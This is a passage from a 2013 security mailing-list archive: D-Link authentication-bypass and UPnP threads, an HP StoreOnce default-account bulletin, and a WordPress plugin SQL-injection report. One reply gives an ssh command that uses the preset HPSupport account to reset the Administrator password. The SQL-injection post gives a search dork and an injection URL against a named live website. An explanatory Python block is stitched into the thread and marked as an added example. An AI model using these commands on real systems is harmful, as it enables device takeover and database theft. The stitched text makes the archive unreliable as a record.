EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in 
order to bring to the attention of users of the affected RSA products important 
security information. RSA recommends that all users determine the applicability 
of this information to their individual situations and take appropriate action. 
The information set forth herein is provided as is without warranty of any 
kind. RSA disclaim all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event shall RSA or its suppliers be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages so 
the foregoing limitation may not apply.

About RSA SecurCare Notes & Security Advisories Subscription
RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA 
sends you based on the RSA product family you currently use. If you'd like to 
stop receiving RSA SecurCare Notes & Security Advisories, or if you'd like to 
change which RSA product family Notes & Security Advisories you currently 
receive, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the 
instructions on the page, remove the check mark next to the RSA product family 
whose Notes & Security Advisories you no longer want to receive. Click the 
Submit button to save your 

Authentication bypass in D-Link devices (session cookies not validated)

2013-07-08 Thread doylej . ia
Vendor: D-Link
Affected Products:
-DIR-505L SharePort Mobile Companion (HW: A1 / FW: 1.01)
-DIR-826L Wireless N600 Cloud Router (HW: A1 / FW: 1.02)
Vendor Notification: April 8, 2013
Public Disclosure: July 8, 2013
Vulnerability Type: Authentication Bypass
CVE Reference: CVE-2013-4772
Solution Status: Not Fixed
Credit: Jason Doyle / tw: jasond0yle

Advisory Details:
It is possible to bypass authentication to gain administrator level access to 
the web management console by navigating directly to any web page while a 
legitimate session is still active. During this window of opportunity, session 
cookies are not validated and an attacker with or without a session cookie can 
gain unfettered access to view and change all configurable settings on the 
device, including the addition / modification of user accounts for persistent 
access. This is not possible once a legitimate session has expired. 
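The behaviour described above, access for anyone while someone else's session is alive and none once it expires, is what you get when the device keeps a single "a session is active until T" flag and never ties a request to the cookie it carries. The block below is an added example, not D-Link firmware code: a minimal model of that flawed gate next to a per-session gate that mints a random token on login and authorises a request only when it presents a live token. Timestamps, the 300 s lifetime and the `reproduce` scenario are constructed for the demonstration.

```python
import secrets


class FlawedGate:
    """Models the reported behaviour: the device only records that some session
    is active until a point in time; the cookie on a request is never consulted."""

    def __init__(self, ttl=300):
        self.ttl = ttl
        self.active_until = 0.0

    def login(self, now):
        self.active_until = now + self.ttl
        return secrets.token_urlsafe(16)        # issued, but never checked

    def is_authorized(self, cookie, now):
        return now < self.active_until          # cookie ignored entirely


class SessionGate:
    """Each login mints an unguessable token; a request is authorised only when
    it presents a token that exists and has not expired. Expired entries are
    dropped on sight so a stale cookie cannot be replayed later."""

    def __init__(self, ttl=300):
        self.ttl = ttl
        self._sessions = {}                     # token -> expiry timestamp

    def login(self, now):
        token = secrets.token_urlsafe(32)       # 256 bits of randomness
        self._sessions[token] = now + self.ttl
        return token

    def logout(self, cookie):
        self._sessions.pop(cookie, None)

    def is_authorized(self, cookie, now):
        if not cookie:
            return False
        expiry = self._sessions.get(cookie)
        if expiry is None:
            return False
        if now >= expiry:
            del self._sessions[cookie]
            return False
        return True


def reproduce(gate_cls):
    """The scenario from the report: the admin logs in; 10 s later a client with
    no cookie and one with a guessed cookie request admin pages; finally the
    admin's own cookie is tried after the session lifetime has passed.
    Returns (no_cookie_allowed, guessed_cookie_allowed, admin_after_expiry)."""
    gate = gate_cls(ttl=300)
    t0 = 1_000_000.0
    admin_cookie = gate.login(t0)
    no_cookie = gate.is_authorized(None, t0 + 10)
    guessed = gate.is_authorized("admin", t0 + 10)
    after_expiry = gate.is_authorized(admin_cookie, t0 + 301)
    return no_cookie, guessed, after_expiry


if __name__ == "__main__":
    print("flawed :", reproduce(FlawedGate))     # (True, True, False)
    print("correct:", reproduce(SessionGate))    # (False, False, False)
```

The flawed gate reproduces the report exactly: both strangers get in while the admin's session is alive, and nobody does after it expires. With the per-session gate the strangers are refused at every point, and the admin's own cookie keeps working until its lifetime ends or it is logged out.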


Re: OS-Command Injection via UPnP Interface in multiple D-Link devices

2013-07-08 Thread krlovett
I can concur these issues exist in several other models as well. In fact, on 
any UPnP enabled D-Link from 868L and down, merely selecting Display Hidden 
Elements inside the developer tool bar, will expose the entire administrative 
GUI.

Additional models I found the same bug, though I'm so sure that the latest 
firmware completely fixes the issues.

Wireless AC1200 Dual Band Gigabit Cloud Router DIR-850L
Wireless AC1200 Dual Band Gigabit Cloud Router DIR-860L
Wireless N150 Home Router DIR-601
Wireless N 8-Port Router DIR-632


Re: OS-Command Injection via UPnP Interface in multiple D-Link devices

2013-07-08 Thread devnull
There is a little mistake in the vulnerable devices. The DAP1522 is not 
vulnerable.

Correct:
Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865

Sorry guys,
Mike


[security bulletin] HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification

2013-07-08 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03813919

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03813919
Version: 2

HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized
Access and Modification

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-06-26
Last Updated: 2013-07-08

Potential Security Impact: Remote unauthorized access, unauthorized
modification

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreOnce D2D
Backup System. The vulnerability could be exploited remotely resulting in
unauthorized access and modification.

Please note that this issue does not affect HP StoreOnce Backup systems that
are running software version 3.0.0 or newer. Devices running software version
3.0.0 or newer do not have a HPSupport user account with a pre-set password
configured.

A user who is logged in via the HPSupport user account does not have access
to the data that has been backed up to the HP StoreOnce Backup system, and
hence is not able to read or download the backed up data. However, it is
possible to reset the device to factory defaults, and hence delete all backed
up data that is present on the device.

References: CVE-2013-2342 (SSRT101216)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StoreOnce D2D Backup platforms running software version 2.2.17 or older
and 1.2.17 or older.

HP StoreOnce D2D4324 Backup System (EH985A)

HP StoreOnce D2D4312 Backup System (EH983B)

HP StoreOnce D2D4312 Backup System (EH983A)

HP StoreOnce D2D4112 Backup System (EH993C)

HP StoreOnce D2D4112 Backup System (EH993B)

HP StoreOnce D2D4106i Backup System (EH996B)

HP StoreOnce D2D4106i Backup System (EH996A)

HP StoreOnce D2D4106fc Backup System (EH998B)

HP StoreOnce D2D4106fc Backup System (EH998A)

HP StoreOnce D2D2504i Backup System (EJ002C)

HP StoreOnce D2D2504i Backup System (EJ002B)

HP StoreOnce D2D2502i Backup System (EJ001C)

HP StoreOnce D2D2502i Backup System (EJ001B)

HP D2D4112 Backup System (EH993A)

HP D2D4009fc Backup System (EH942A)

HP D2D4009i Backup System (EH939A)

HP D2D4004fc Backup System (EH941A)

HP D2D4004i Backup System (EH938A)

HP D2D2504i Backup System (EJ002A)

HP D2D2503i Backup System (EH945A)

HP D2D2502i Backup System (EJ001A)

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2013-2342(AV:A/AC:L/Au:S/C:C/I:C/A:C)   7.7
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has made the following software updates available to resolve the
vulnerability.

HP StoreOnce D2D Backup platforms running software version 2.2.18 or
subsequent.

HP StoreOnce D2D Backup platforms running software version 1.2.18 or
subsequent.

Customers will need to upgrade their affected HP StoreOnce Backup systems
with the software update.

HISTORY
Version:1 (rev.1) - 26 June 2013 Initial release
Version:2 (rev.2) - 8 July 2013 Software updates released and reporter
acknowledgement provided

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided 

Re: [security bulletin] HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification

2013-07-08 Thread Neusbeer


VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreOnce D2D
Backup System. The vulnerability could be exploited remotely resulting in
unauthorized access and modification.

A user who is logged in via the HPSupport user account does not have access
to the data that has been backed up to the HP StoreOnce Backup system, and
hence is not able to read or download the backed up data. However, it is
possible to reset the device to factory defaults, and hence delete all backed
up data that is present on the device.


But you can change the password of the administrator so you can access 
the web GUI:


ssh -l HPSupport ip

 set password Administrator LetMeIn




Re: WordPress feed plugin Sql Injection

2013-07-08 Thread Henri Salo
On Tue, Jul 02, 2013 at 12:01:15PM +0000, iedb.t...@gmail.com wrote:
> The WordPress feed plugin suffers from a Sql Injection vulnerability.
> 
> #
> 
> #  Iranian Exploit DataBase
> 
> #   http://exploit.iedb.ir
> 
> #
> 
> # Exploit Title : WordPress feed plugin Sql Injection
> 
> # Author : Iranian Exploit DataBase
> 
> # Discovered By : IeDb
> 
> # Email : iedb.t...@gmail.com
> 
> # Home : http://exploit.iedb.ir
> 
> # Software Link : http://wordpress.org/
> 
> # Security Risk : High
> 
> # Tested on : Linux
> 
> # Dork : inurl:wp-content/plugins/feed/
> 
> #
> 
> # Exploit :
> 
> # http://www.Site.com/wp-content/plugins/feed/news_dt.php?nid=[Sql]
> 
> # Dem0 :
> 
> # http://easy2remind.com/newsworld/wp-content/plugins/feed/news_dt.php?nid=257[Sql]
> 
> #
> 
> #
> 
> # Exploit Archive = http://exploit.iedb.ir/exploits-176.html
> 
> #

Could you give us proper software link, thanks. There is no such plugin in
WordPress plugin repository[1]. Is this non-free plugin? Searching for
inurl:/wp-content/plugins/feed/news_dt.php only finds easy2remind.com website.

1: http://plugins.svn.wordpress.org/feed/

---
Henri Salo


signature.asc
Description: Digital signature